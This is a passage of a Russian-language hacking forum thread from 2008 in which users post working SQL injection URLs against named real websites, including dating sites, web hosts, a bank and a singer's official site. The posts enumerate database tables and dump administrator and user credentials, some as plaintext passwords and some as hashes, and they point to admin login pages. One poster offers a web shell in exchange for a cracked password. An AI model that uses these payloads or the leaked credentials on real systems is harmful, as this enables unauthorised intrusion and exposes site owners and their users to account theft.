SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    loveus.ru

    http://loveus.ru/forum/?roomid=341/**/union/**/select/**/version(),2--

    Версия MySQL:
    5.1.26-rc
    -------
    Имя базы:
    lovas
    -------
    Юзер:
    admin@localhost

    Данные по полям User,Password,File_priv из таблицы mysql.user:
    -------
    root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
    root:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
    Dunkan:*6FD087AFBFB4C2995C3C0AD9D2D5FB582CDDBF46:Y
    lovas:*47B11BE6589C2FDE355C316D9DB18DB0C06CC536:Y
    admin:*8D2CB9C6E278D6BEB907831E7424A632C17C0641:Y
     
  2. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    www.glaad.org
    /etc/passwd
    file_priv=y
    document root
    /www/www/doc-root/media/resource_kit_detail.php
    залить нелл не удалось, ненашел папку справами на запись

    www.dissentmagazine.org
    admin:32fea379cc31c22c27761ec9d08e630c
    root:0643c3fdceb7e8eeeaa914850a1eec85
    админку неискал, хеши не расшифровывал =)
     
  3. 1337haxx0r

    1337haxx0r Member

    Joined:
    16 Sep 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    Всем привА.
    Я тут решил запостится.
    вообщем так.

    вот сайтеГ нашёл
    Code:
    http://www.penpal.ru
    решил же глянуть, чё там и к чему =)

    Как всегда, стандартная проверка
    Code:
    http://www.penpal.ru/cgi-bin/person.pl?id=-1175185312'
    Узнаем что имееЦЦо 28 полей, и одно принтабельное - 21
    Code:
    http://www.penpal.ru/cgi-bin/person.pl?id=1175185312+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
    Версия скулИ 5-я
    (пальцем в небо) ибо даже через http://www.penpal.ru/cgi-bin/person.pl?id=1175185312+and+substring(@@version,1,1)=5 не признавалось, или это Я =)))))


    короче полазил, полазил...нашёл таблицу person
    а в ней поля
    id - идентификаторы
    passw - пароли в чистом виде
    email - мылы
    icq - аси(есть не у всех)

    похакал.....и дальше пошёл
    Одминку не нашёл =(

    -----
    P.S
    Странно было, когда я ввёл в это принтабельное поле запрос version()....оно не выдало мне версию, а выдало что такой таблицы нету.
     
    #6643 1337haxx0r, 1 Oct 2008
    Last edited: 1 Oct 2008
    1 person likes this.
  4. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    1337haxx0r
    а так не пробвал ? ))
     
  5. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Официальный сайт Группы "Ляпис Трубецкой"
    Единственная таблица которую нашел.
     
  6. 1337haxx0r

    1337haxx0r Member

    Joined:
    16 Sep 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    ....фак, я и не знал....поэтому и не додумался =)

    но спасибо, теперь уж буду знать =)
     
    #6646 1337haxx0r, 1 Oct 2008
    Last edited: 1 Oct 2008
  7. 1337haxx0r

    1337haxx0r Member

    Joined:
    16 Sep 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    Вот ещё нашёл сайтеГ =)

    Вообщем, проверяем и видим ошибочку скулЯ

    Code:
    http://www.kateeya.com/content.php?menu=-2'
    имеем 6 полей одно принтабельное - 2

    Code:
    http://www.kateeya.com/content.php?menu=2+order+by+6--
    
    http://www.kateeya.com/content.php?menu=2+union+select+1,2,3,4,5,6--
    
    Версия скули 5-я
    Значит заюзаем information_schema

    Code:
    http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a3a,table_name,column_name),3,4,5,6++from+information_schema.columns--
    нам тут полный фарт, видим все таблицы с полями, ищем интерессные.....а это
    siji_user:::user_id - идентификаторы
    siji_user:::user_name - юзеры
    siji_user:::user_pwd - пароли в чистом виде
    siji_user:::user_email - мылы

    смотрим и видим одну запись....которая нас радует и при этом поднимает настроение =)))))

    Code:
    http://www.kateeya.com/content.php?menu=2+union+select+1,concat_ws(0x3a3a3a,user_name,user_pwd),3,4,5,6++from+siji_user--
    Конечный итог:
    Username: admin
    Password: admin
    Админка: http://www.kateeya.com/admin/login.php

    ----
    Пока что всё, всем приятного и удачного хакинга =))))
     
    1 person likes this.
  8. 1337haxx0r

    1337haxx0r Member

    Joined:
    16 Sep 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    ещё один бажный сайт.....хостинг

    Проверяем
    Code:
    http://www.webhostingjury.com/hosts.php?id=-534'
    имеем ошибкку, и узнаем что имееЦЦо 3 поля, одно принтабельно - 2

    Code:
    http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,2,3--
    Версия Мускуля 5-я
    знач обращаемся к нашей информационной таблице information_schema

    Code:
    http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,table_name,column_name),3+from+information_schema.columns--
    ждём пока выведутся все поля и таблицы...

    находим нас интересующие, а именно:

    admin:::adm_username - имя админского юзера
    admin:::adm_password - пароль в открытом виде

    или

    hosts:::username - имя юзера(хоста)
    hosts::: password - пароли в чистом виде


    Code:
    http://www.webhostingjury.com
    /hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,adm_password,adm_username),3+from+admin--
    
    http://www.webhostingjury.com/hosts.php?id=-534+union+select+1,concat_ws(0x3a3a3a,password,username),3+from+hosts--
    
    я брал админа.
    получаем: imkool:::ajay

    Конечный итог:
    Admin Username: ajay
    Admin Password: imkool

    Админка: http://www.webhostingjury.com./adm/www/admin/index.php

    ---
    ...но почему-то не проходит инфа в админке...
    логин юзеров не искал....
     
    2 people like this.
  9. 1337haxx0r

    1337haxx0r Member

    Joined:
    16 Sep 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    ну я сегодня в угаре(на работе нечего делать) =))))

    сайт знакомств, с виду приличный...а как капнёшь глубже...ппц

    Смотрим, скуля начинает ругаЦЦо =)
    Code:
    http://www.datingfunda.com/clubs/group_profile.php?group_id=-215'
    пробиваем поля, у нас их 23, из них штук 5 принтабельных.
    Версия скулИ 5-я (везёт мне) =)

    поперебирал я лимитом....нашёл таблицы

    dating_adminmembers:::username
    dating_adminmembers::: password

    Code:
    http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+limit+166,1--
    и

    members:::username
    members::: password

    Code:
    http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,table_name,column_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+limit+519,1--
    Я брал админа
    Code:
    http://www.datingfunda.com/clubs/group_profile.php?group_id=-215+union+select+1,2,3,4,concat_ws(0x3a3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dating_adminmembers--
    admin:::admin456
    пасс в чистейшем виде, оч замечательно =)

    ОдминкО: http://www.datingfunda.com/webadmin/
     
  10. 1337haxx0r

    1337haxx0r Member

    Joined:
    16 Sep 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    ещё один хостинг


    14 полей, два принтабельных - 6,7
    Code:
    http://www.torontowebhost.com/mod.php?mod=pages&mode=view&id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
    Версия скули 4-я
    будем перебирать ручками...
    и без особого труда нашлась табличка admins

    в которой присутсвовали поля:
    admin_user_name
    admin_email

    к сожалению поле с паролями не побобрал....пробовал много вариантов....но без результатно.
    Code:
    http://www.torontowebhost.com/mod.php?mod=pages&mode=view&id=-2+union+select+1,2,3,4,5,concat_ws(0x3a3a3a,admin_user_name,admin_email),7,8,9,10,11,12,13,14+from+admins--
    webmaster:::[email protected]
    может кому будет интерессно, подберёт =)

    логин в админку:
    Code:
    http://www.torontowebhost.com/login.php?w=admin&o=login

    -----
    Там ещё в портфолио есть сайты.....так же коряво написаны
     
    1 person likes this.
  11. 1337haxx0r

    1337haxx0r Member

    Joined:
    16 Sep 2008
    Messages:
    8
    Likes Received:
    6
    Reputations:
    0
    офф сайт украинской певицы Русланы

    там 5-я версия скули.
    Code:
    http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a3a3a,table_name,column_name)+from+information_schema.columns--
    одно поле...оно же принтабельно

    Code:
    http://www.ruslana.ua/ua/press.php?ln=-1+union+select+1--
    имеем права на доступ к таблице mysql
    Code:
    http://www.ruslana.ua/ua/press.php?ln=-1+union+select+concat_ws(0x3a3a3a,user,password)+from+mysql.user--
    показало три юзера


    root:::*A6D3F6E96E35BC972C685AFE44507517B5C87F4C
    root:::
    astra:::*C301AD7E05B309F011D781BA2E1CD97AF0CC9622


    дальше ничё особо не делал =)
     
    1 person likes this.
  12. 3xIm3

    3xIm3 Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    74
    Likes Received:
    42
    Reputations:
    0
    Code:
    http://www.davinciinstitute.com/page...ersion(),5,6/*
    version: 5.0.42
    user: davinci@localhost
    database: davinciinstitute_com


    Code:
    http://trusteelearning.org/news_read...on(),6,7,8,9/*
    version: 4.1.20-max-log
    user: [email protected]
    database: savoadm_etraining


    Code:
    http://quiddich.voldemort.ru/forum.p...,4,5,6,7,8,9/*
    version: 4.1.22
    user: voldemor_loki@localhost
    database: voldemor_loki


    Code:
    http://www.bt-shop.ru/section_output...sion(),5,6,7/*
    version: 4.0.27-log
    user: [email protected]
    database: bt-shop
     
    1 person likes this.
  13. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    1
    2

    апд: юзаем http://code.google.com/p/awebtool/ ;)
     
    _________________________
    #6653 TANZWUT, 3 Oct 2008
    Last edited: 3 Oct 2008
    3 people like this.
  14. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://www.downtowncrossing.org/shop/shop.php?id=103+union+select+1,version(),3,4
    version() - 5.0.51a-log
    user() - Children
    database() - Children

    http://shop.vashtextil.com.ua/shop.php?id=-1'+union+select+1,2,3,4,5/*
    user()- [email protected]

    http://www.spygenius.co.uk/shop.php?id=-1+union+all+select+1,2,version(),4,5,6
    version() - 5.0.27-log
    user() - [email protected]
    database() - spygenius

    http://www.uazmadi.ru/shop.php?id=-6+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13
    version() - 5.0.37
    user() - avtomoto@localhost
    database() - avtomoto


    http://www.avtobamper.ru/shop.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13
    version() - 5.0.37
    user() - avtomoto@localhost
    database() - avtobamper

    http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+version()
    version() - 5.0.45-log -
    user() - site@localhost
    database() - property_site
    http://www.propertiesbulgaria.biz/shop.php?id=-11+union+select+concat_ws(0x3a,userid,username,password)+from+admin_users+limit%201,1
    Code:
    2:admin:$1$jzxqs61n$6hbnVvtb1cJMuHJUJgVEo1
    3:alex:$1$rygwg7ng$vwJgHDDb6kOwbn5HcuvT80
    4:silveto:$1$55ff1d9v$4ICVoQL.pf0eGBGviplP5.
    5:test:$1$8mx0df49$y63yix4opv5W/.YYTAaUT/
    6:petya:$1$9v1qx3yv$74NKlG/INFJictQUM6TGN0
    
    http://www.propertiesbulgaria.biz/admin админка здесь ;)
     
    1 person likes this.
  15. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Міжрегіональна Академія управління персоналом (МАУП)
    PR: 4
    тИЦ: 180
    http://www.maup.com.ua/news/newst.php?tema=-9999+union+select+1,2,version(),4,5/*

    VERSION: 4.0.27-standard
     
    1 person likes this.
  16. luz3r

    luz3r Banned

    Joined:
    23 Feb 2008
    Messages:
    119
    Likes Received:
    250
    Reputations:
    -11
    :rolleyes:
     
    4 people like this.
  17. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    version: 4.1.22
    user: dissent@localhost
    database: dissent

    Вывод внизу.

    -----------------------------------------------------------

    version: 5.0.41-log
    user: root@localhost
    database: tinymce

     
    #6657 DJ ][akep, 4 Oct 2008
    Last edited: 4 Oct 2008
    1 person likes this.
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    file_priv a также dir )

    юзеры форума.. forum.ruslana.ua

    wp..

    admin:$P$B3XVWvBWhENjDsGfhZvFnT9bwxsyI7/

    дай пасс дам шелл )

    пс: заветное поле - pword
     
    #6658 sabe, 4 Oct 2008
    Last edited: 5 Oct 2008
    1 person likes this.
  19. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    fastpublish cms

    admin:skatrunde:0a8e991a10144d5056eac00f50b10f2f
     
  20. masternet

    masternet Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.bfgbank.ru/index.php?BFGBASID=d8ae804ab8c24dae8dee6eca71b17774&action=LegalServises'+union+select+1--
    вот скуля на банке..дальше как крутить не знаю..+информатион_схема.теблес не идёт(((
     
Thread Status:
Not open for further replies.